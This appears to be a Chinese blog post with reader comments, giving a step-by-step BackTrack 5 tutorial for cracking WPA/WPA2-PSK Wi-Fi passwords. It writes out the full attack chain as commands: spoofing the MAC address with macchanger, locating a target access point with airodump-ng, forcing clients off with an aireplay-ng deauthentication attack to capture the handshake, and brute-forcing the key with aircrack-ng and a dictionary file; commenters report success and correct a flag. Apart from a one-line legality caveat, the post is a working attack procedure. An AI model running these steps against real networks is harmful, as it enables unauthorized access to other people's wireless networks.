• 博客访问: 105912
  • 博文数量: 59
  • 博客积分: 1181
  • 博客等级: 少尉
  • 技术积分: 580
  • 用 户 组: 普通用户
  • 注册时间: 2012-02-28 22:19
文章分类

全部博文(59)

文章存档

2012年(59)

订阅

分类: 网络与安全

说到BackTrack 大家应该第一个就想到破解wifi密码,没错,当年我一开始用BackTrack也是为了要破解密码阿……^^”

前几天有朋友问我说怎么用BT5破解WPA/WPA2-PSK的密码,要破解WPA/WPA2-PSK的密码比起wep难了许多,说真的,除了工具外最需要的还是运气跟密码文件阿…..^^”

不多说,来看看吧!!

首先下载BT5的光盘候用BT5开机,哪边下载跟怎么设定开机就不要提了。
开机后透过 startx 指令进入桌面环境,BT5的桌面还挺漂亮的!!
首先先把装置停掉,改卡号,假设我的网卡界面是 wlan0

点击(此处)折叠或打开

  1. airmon-ng stop wlan0
  2. macchanger --mac 00:11:22:33:44:55 wlan0
  3. airmon-ng start wlan0
接着扫描我们要抓的AP

点击(此处)折叠或打开

  1. airodump-ng wlan0


其中可以看到有非常多个AP,这边我们以我自己的AP为例子,再次声明,破解他人AP的密码是违法的行为。
其中我们要记得 BSSID: 84:C9:XX:XX:XX:XX 跟 CH:6
airodump-ng  -c (填入刚刚的CH) -w (随便给一个名字) –bssid (要破解的BSSID) wlan0

点击(此处)折叠或打开

  1. airodump-ng -c 6 -w crack_pw_test –bssid 84:C9:XX:XX:XX:XX wlan0
其中画面会像这样子

我们可以看到有三个装置连到这个AP,随便选一个例如 (90:ZZ:ZZ:ZZ:ZZ:ZZ)
接着输入
aireplay-ng  -0 10  -a (BSSID) -c (client_MAC) wlan0

点击(此处)折叠或打开

  1. aireplay-ng -0 10 -a 84:C9:XX:XX:XX:XX -c 90:ZZ:ZZ:ZZ:ZZ:ZZ wlan0

应该可以看到如图所示的WAP Handshake


此时已经接近成功了,如果没有出现类似这样图示的东西的话请重新执行几次。直到完成Handshake为止。
最后就是跑字典文件了
aircrack-ng -w (字典文件) -b (BSSID) (刚刚给的名字)

点击(此处)折叠或打开

  1. aircrack-ng -w dict.txt -b 84:C9:XX:XX:XX:XX crack_pw_test.cap
至于跑不跑得出结果就看个人的造化(字典文件的大小)了!!!最后奉送一个找来的字典文件!!!
阅读(43834) | 评论(3) | 转发(2) |
给主人留下些什么吧!~~

stg1012013-02-03 16:52:13

yansw:我的成功,密码 12345678 ,在此感谢 .中间2个地方给其他网友提醒:

  airodump-ng -c 6 -w crack_pw_test –bssid 84:C9:XX:XX:XX:XX wlan0
  注意 bssid前是-- 

2

最后
aircrack-ng -w dict.txt -b 84:C9:XX:XX:XX:XX crack_pw_*.cap

请问我在最后一步时为什么会提示NO valid WPA handshakes found...  但已经实现了握手了。我自己 再看看 。有空的话麻烦你了。

回复 | 举报

yansw2013-01-19 10:20:06

我的成功,密码 12345678 ,在此感谢 .中间2个地方给其他网友提醒:

  airodump-ng -c 6 -w crack_pw_test –bssid 84:C9:XX:XX:XX:XX wlan0
  注意 bssid前是-- 

2

最后
aircrack-ng -w dict.txt -b 84:C9:XX:XX:XX:XX crack_pw_*.cap

2007robot2013-01-12 10:48:43

之前听过别人讲的,不过没尝试过,呵呵!

评论热议
请登录后评论。

登录 注册